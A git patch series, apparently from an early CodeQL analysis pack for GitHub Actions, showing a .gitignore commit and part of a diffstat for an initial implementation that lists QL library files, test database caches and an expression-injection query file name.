From 70a7bb1f7566447d73ff56d3c27b4d6913cf984b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 09:25:33 +0100 Subject: [PATCH 0001/1267] Add .gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 00000000000..e43b0f98895 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +.DS_Store From 45d959d13fb981ce2f8dc9e2396a5401321cb8a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 09:26:11 +0100 Subject: [PATCH 0002/1267] Initial implementation --- build-dbs.sh | 5 + codeql-workspace.yml | 3 + ql/lib/actions.qll | 1 + ql/lib/codeql-pack.lock.yml | 16 + ql/lib/codeql/Locations.qll | 71 +++ ql/lib/codeql/actions/Ast.qll | 256 ++++++++++ ql/lib/codeql/actions/Cfg.qll | 7 + ql/lib/codeql/actions/DataFlow.qll | 10 + ql/lib/codeql/actions/TaintTracking.qll | 10 + .../codeql/actions/ast/internal/Actions.qll | 400 ++++++++++++++++ ql/lib/codeql/actions/ast/internal/Yaml.qll | 50 ++ .../actions/controlflow/BasicBlocks.qll | 445 ++++++++++++++++++ .../actions/controlflow/internal/Cfg.qll | 169 +++++++ .../codeql/actions/dataflow/FlowSources.qll | 137 ++++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 31 ++ .../internal/DataFlowImplSpecific.qll | 11 + .../dataflow/internal/DataFlowPrivate.qll | 312 ++++++++++++ .../dataflow/internal/DataFlowPublic.qll | 78 +++ .../internal/TaintTrackingImplSpecific.qll | 11 + .../internal/TaintTrackingPrivate.qll | 30 ++ .../actions/ideContextual/IDEContextual.qll | 19 + .../codeql/actions/ideContextual/printAst.qll | 137 ++++++ ql/lib/codeql/files/FileSystem.qll | 177 +++++++ .../codeql-database.yml | 39 ++ ql/lib/ide-contextual-queries/printAst.ql | 29 ++ ql/lib/ide-contextual-queries/printCfg.ql | 53 +++ ql/lib/qlpack.gbo | 13 + ql/lib/qlpack.yml | 15 + ql/lib/test-db/baseline-info.json | 1 + ql/lib/test-db/codeql-database.yml | 10 + ql/lib/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 24 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 32 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 24 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 1080 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 544 bytes .../db-yaml/default/cache/pages/01.pack | Bin 0 -> 118 bytes .../db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes .../db-yaml/default/cache/pages/0d.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/15.pack | Bin 0 -> 131 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/1f.pack.d | Bin 0 -> 85 bytes .../db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes .../db-yaml/default/cache/pages/34.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/34.pack.d | Bin 0 -> 865 bytes .../db-yaml/default/cache/pages/37.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/37.pack.d | Bin 0 -> 163 bytes .../db-yaml/default/cache/pages/43.pack | Bin 0 -> 368 bytes .../db-yaml/default/cache/pages/54.pack | Bin 0 -> 229 bytes .../db-yaml/default/cache/pages/55.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/55.pack.d | Bin 0 -> 140 bytes .../db-yaml/default/cache/pages/9c.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/9c.pack.d | Bin 0 -> 1086 bytes .../db-yaml/default/cache/pages/a1.pack | Bin 0 -> 99 bytes .../db-yaml/default/cache/pages/b4.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/b4.pack.d | Bin 0 -> 156 bytes .../db-yaml/default/cache/pages/b7.pack | Bin 0 -> 282 bytes .../db-yaml/default/cache/pages/b9.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/bc.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/bc.pack.d | Bin 0 -> 596 bytes .../db-yaml/default/cache/pages/c0.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/c3.pack | Bin 0 -> 115 bytes .../db-yaml/default/cache/pages/e0.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/f3.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/predicates/02.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 0 -> 144 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 0 -> 136 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/predicates/3b.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 170 bytes .../db-yaml/default/cache/predicates/53.pack | Bin 0 -> 141 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 140 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/7c.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 0 -> 141 bytes .../db-yaml/default/cache/predicates/a1.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/a2.pack | Bin 0 -> 144 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 0 -> 157 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 148 bytes .../db-yaml/default/cache/predicates/d4.pack | Bin 0 -> 170 bytes .../db-yaml/default/cache/predicates/e3.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/relations/06.pack | Bin 0 -> 289 bytes .../db-yaml/default/cache/relations/10.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/11.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/19.pack | Bin 0 -> 289 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/2a.pack | Bin 0 -> 177 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/39.pack | Bin 0 -> 272 bytes .../db-yaml/default/cache/relations/4b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/56.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5c.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/7c.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/9f.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/a0.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes .../db-yaml/default/cache/relations/bf.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d3.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/e9.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/f9.pack | Bin 0 -> 143 bytes ql/lib/test-db/db-yaml/default/cache/version | 1 + .../db-yaml/default/containerparent.rel | Bin 0 -> 80 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/default/files.rel | Bin 0 -> 8 bytes .../db-yaml/default/files.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/default/folders.rel | Bin 0 -> 80 bytes .../db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/locations_default.rel | Bin 0 -> 1416 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes ql/lib/test-db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes .../db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes .../db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes ql/lib/test-db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes .../db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/lib/test-db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/lib/test-db/db-yaml/default/yaml.rel | Bin 0 -> 1416 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/yaml_locations.rel | Bin 0 -> 472 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 552 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240203T091755.518Z.json | 0 ...-diagnostics-add-20240203T091756.033Z.json | 0 .../database-create-20240203.101754.571.log | 275 +++++++++++ ...tabase-index-files-20240203.101755.239.log | 15 + ql/lib/test-db/src.zip | Bin 0 -> 578 bytes ql/lib/test/test.ql | 59 +++ ql/lib/test/test.yml | 36 ++ ql/lib/yaml.dbscheme | 80 ++++ ql/lib/yaml.dbscheme.stats | 4 + .../Security/CWE-094/ExpressionInjection.ql | 37 ++ ql/src/codeql-pack.lock.yml | 16 + .../codeql-suites/actions-code-scanning.qls | 0 ql/src/qlpack.yml | 14 + ql/src/test-db/baseline-info.json | 1 + ql/src/test-db/codeql-database.yml | 10 + ql/src/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 80 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 116 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 80 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 4776 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-15fd6561 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-15fd6561#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-729b2108 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-729b2108#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-7595a81e | Bin 0 -> 16 bytes ...king#f6f2598d--TaintFlow-7595a81e#0#tttttt | Bin 0 -> 260 bytes ...Tracking#f6f2598d--TaintFlow-7595a81e#1#tt | Bin 0 -> 68 bytes ...TaintTracking#f6f2598d--TaintFlow-cd159b4d | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-cd159b4d#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-d2947120 | Bin 0 -> 16 bytes ...tTracking#f6f2598d--TaintFlow-d2947120#0#t | Bin 0 -> 2392 bytes ...TaintTracking#f6f2598d--TaintFlow-d8fdd114 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-d8fdd114#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 0 -> 16 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 0 -> 12 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 0 -> 16 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 0 -> 12 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 0 -> 16 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 0 -> 16 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 0 -> 12 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 0 -> 16 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 0 -> 12 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 0 -> 24 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 0 -> 16 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 0 -> 12 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 0 -> 12 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 0 -> 16 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 0 -> 12 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 0 -> 128 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 0 -> 16 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 0 -> 16 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 0 -> 12 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 0 -> 16 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 0 -> 12 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 0 -> 12 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 0 -> 16 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 0 -> 16 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 0 -> 16 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 2392 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 0 -> 16 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 0 -> 12 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 0 -> 16 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 0 -> 12 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 0 -> 16 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 0 -> 12 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 0 -> 12 bytes .../tuples#printAst#38acf19d--TPrintNode | Bin 0 -> 16 bytes .../tuples#printAst#38acf19d--TPrintNode#0#e | Bin 0 -> 2672 bytes .../db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes .../db-yaml/default/cache/pages/04.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 0 -> 125 bytes .../db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 0 -> 162 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes .../db-yaml/default/cache/pages/2e.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/2e.pack.d | Bin 0 -> 316 bytes .../db-yaml/default/cache/pages/32.pack | Bin 0 -> 112 bytes .../db-yaml/default/cache/pages/46.pack | Bin 0 -> 99 bytes .../db-yaml/default/cache/pages/4b.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/4b.pack.d | Bin 0 -> 3805 bytes .../db-yaml/default/cache/pages/67.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/67.pack.d | Bin 0 -> 664 bytes .../db-yaml/default/cache/pages/71.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/71.pack.d | Bin 0 -> 618 bytes .../db-yaml/default/cache/pages/82.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/82.pack.d | Bin 0 -> 354 bytes .../db-yaml/default/cache/pages/91.pack | Bin 0 -> 112 bytes .../db-yaml/default/cache/pages/92.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/92.pack.d | Bin 0 -> 2612 bytes .../db-yaml/default/cache/pages/95.pack | Bin 0 -> 124 bytes .../db-yaml/default/cache/pages/99.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/99.pack.d | Bin 0 -> 1311 bytes .../db-yaml/default/cache/pages/a3.pack | Bin 0 -> 149 bytes .../db-yaml/default/cache/pages/a3.pack.d | Bin 0 -> 797 bytes .../db-yaml/default/cache/pages/a4.pack | Bin 0 -> 106 bytes .../db-yaml/default/cache/pages/ab.pack | Bin 0 -> 119 bytes .../db-yaml/default/cache/pages/b6.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/b6.pack.d | Bin 0 -> 324 bytes .../db-yaml/default/cache/pages/bd.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/ce.pack | Bin 0 -> 173 bytes .../db-yaml/default/cache/pages/d0.pack | Bin 0 -> 85 bytes .../db-yaml/default/cache/pages/de.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/de.pack.d | Bin 0 -> 688 bytes .../db-yaml/default/cache/pages/df.pack | Bin 0 -> 86 bytes .../db-yaml/default/cache/pages/e4.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/e6.pack | Bin 0 -> 117 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/predicates/01.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 0 -> 339 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 0 -> 232 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/1f.pack | Bin 0 -> 210 bytes .../db-yaml/default/cache/predicates/20.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 0 -> 537 bytes .../db-yaml/default/cache/predicates/25.pack | Bin 0 -> 214 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/28.pack | Bin 0 -> 423 bytes .../db-yaml/default/cache/predicates/2a.pack | Bin 0 -> 214 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/predicates/32.pack | Bin 0 -> 211 bytes .../db-yaml/default/cache/predicates/36.pack | Bin 0 -> 213 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 367 bytes .../db-yaml/default/cache/predicates/43.pack | Bin 0 -> 223 bytes .../db-yaml/default/cache/predicates/45.pack | Bin 0 -> 410 bytes .../db-yaml/default/cache/predicates/57.pack | Bin 0 -> 411 bytes .../db-yaml/default/cache/predicates/59.pack | Bin 0 -> 408 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 375 bytes .../db-yaml/default/cache/predicates/5b.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/5d.pack | Bin 0 -> 204 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/66.pack | Bin 0 -> 225 bytes .../db-yaml/default/cache/predicates/6c.pack | Bin 0 -> 206 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/74.pack | Bin 0 -> 418 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 0 -> 345 bytes .../db-yaml/default/cache/predicates/78.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/7b.pack | Bin 0 -> 210 bytes .../db-yaml/default/cache/predicates/7e.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/83.pack | Bin 0 -> 207 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 0 -> 341 bytes .../db-yaml/default/cache/predicates/8d.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/96.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/98.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 0 -> 336 bytes .../db-yaml/default/cache/predicates/9f.pack | Bin 0 -> 211 bytes .../db-yaml/default/cache/predicates/a0.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/a9.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/bd.pack | Bin 0 -> 250 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 0 -> 157 bytes .../db-yaml/default/cache/predicates/c9.pack | Bin 0 -> 219 bytes .../db-yaml/default/cache/predicates/ca.pack | Bin 0 -> 254 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 363 bytes .../db-yaml/default/cache/predicates/d5.pack | Bin 0 -> 260 bytes .../db-yaml/default/cache/predicates/dc.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/de.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/df.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/e0.pack | Bin 0 -> 207 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/ef.pack | Bin 0 -> 221 bytes .../db-yaml/default/cache/predicates/f8.pack | Bin 0 -> 215 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/predicates/ff.pack | Bin 0 -> 253 bytes .../db-yaml/default/cache/relations/07.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/0d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/0e.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/10.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/14.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/18.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/19.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/1b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/28.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 0 -> 177 bytes .../db-yaml/default/cache/relations/39.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/47.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/4d.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/52.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/56.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/59.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5b.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5d.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/80.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/85.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/8b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/aa.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes .../db-yaml/default/cache/relations/c1.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/cc.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d0.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d5.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/da.pack | Bin 0 -> 126 bytes ql/src/test-db/db-yaml/default/cache/version | 1 + .../db-yaml/default/containerparent.rel | Bin 0 -> 128 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes ql/src/test-db/db-yaml/default/files.rel | Bin 0 -> 56 bytes 